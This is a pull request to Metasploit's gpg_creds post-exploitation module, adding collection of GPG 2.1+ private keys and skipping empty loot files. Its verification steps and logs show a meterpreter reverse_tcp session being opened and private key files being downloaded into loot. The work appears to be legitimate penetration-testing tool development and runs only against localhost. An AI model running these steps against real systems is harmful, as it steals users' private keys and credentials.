### PR TITLE
Update gpg_creds: Add GPG 2.1+ keys, Stop storing empty files

### DIFF
--- a/modules/post/multi/gather/gpg_creds.rb
+++ b/modules/post/multi/gather/gpg_creds.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Post
         machine. Password protected secret keyrings can be cracked with John the Ripper (JtR).
       },
       'License'        => MSF_LICENSE,
-      'Author'         => 
+      'Author'         =>
         [
           'Dhiru Kholia <dhiru[at]openwall.com>', # Original author
           'Henry Hoggard' # Add GPG 2.1 keys, stop writing empty files


### PR DESCRIPTION
## Overview

Small change to the post module gpg_creds.
* No longer stores loot if the file is empty or failed reading.
* Now supports gathering of GPG 2.1+ keys, which are stored in `$HOME/.gnupg/private-keys-v1.d`.

## Verification

List the steps needed to make sure this thing works

- [ ] Generate test GPG keys
- [ ] `gpg --generate-key`
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/handler`
- [ ] `set payload linux/x64/meterpreter/reverse_tcp`
- [ ] `set lhost 127.0.0.1`
- [ ] `run`
- [ ]  Connect shell
- [ ]  `use post/multi/gather/gpg_creds`
- [ ]  `set session 1`
- [ ]  `run`
- [ ] Verify GPG keys are captured in loot.
- [ ] Verify no empty files are stored in loot.

## Logs

```
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf5 exploit(multi/handler) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Sending stage (3021284 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:43072) at 2019-12-04 21:48:51 +0000

meterpreter > 
Background session 1? [y/N]  y
[-] Unknown command: y.
msf5 exploit(multi/handler) > use post/multi/gather/gpg_creds 
msf5 post(multi/gather/gpg_creds) > set session 1 
session => 1
msf5 post(multi/gather/gpg_creds) > run

[*] Finding .gnupg directories
[*] Looting 3 directories
[+] File stored in: /root/.msf4/loot/20191204214908_default_127.0.0.1_gpg.pubring.kbx_339419.txt
[*] Downloading /root/.gnupg/pubring.kbx -> pubring.kbx
[+] File stored in: /root/.msf4/loot/20191204214908_default_127.0.0.1_gpg.pubring.kbx_217234.txt
[*] Downloading /root/.gnupg/pubring.kbx~ -> pubring.kbx~
[+] File stored in: /root/.msf4/loot/20191204214908_default_127.0.0.1_gpg.pubring.kbx_580296.txt
[*] Downloading /root/.gnupg/trustdb.gpg -> trustdb.gpg
[+] File stored in: /root/.msf4/loot/20191204214908_default_127.0.0.1_gpg.trustdb_597700.txt
[*] Finding .gnupg >= 2.1 directories
[*] Looting 3 directories
[*] Downloading /root/.gnupg/private-keys-v1.d/B04560E0DB0901938C2FCEC7293C8EA5F50E0FBA.key -> B04560E0DB0901938C2FCEC7293C8EA5F50E0FBA.key
[+] File stored in: /root/.msf4/loot/20191204214909_default_127.0.0.1_gpg.B04560E0DB09_120765.txt
[*] Downloading /root/.gnupg/private-keys-v1.d/FA5D78875510FD68D0493F5D7CB525B6A95C1B0A.key -> FA5D78875510FD68D0493F5D7CB525B6A95C1B0A.key
[+] File stored in: /root/.msf4/loot/20191204214909_default_127.0.0.1_gpg.FA5D78875510_195913.txt
[*] Post module execution completed
msf5 post(multi/gather/gpg_creds) > l
```

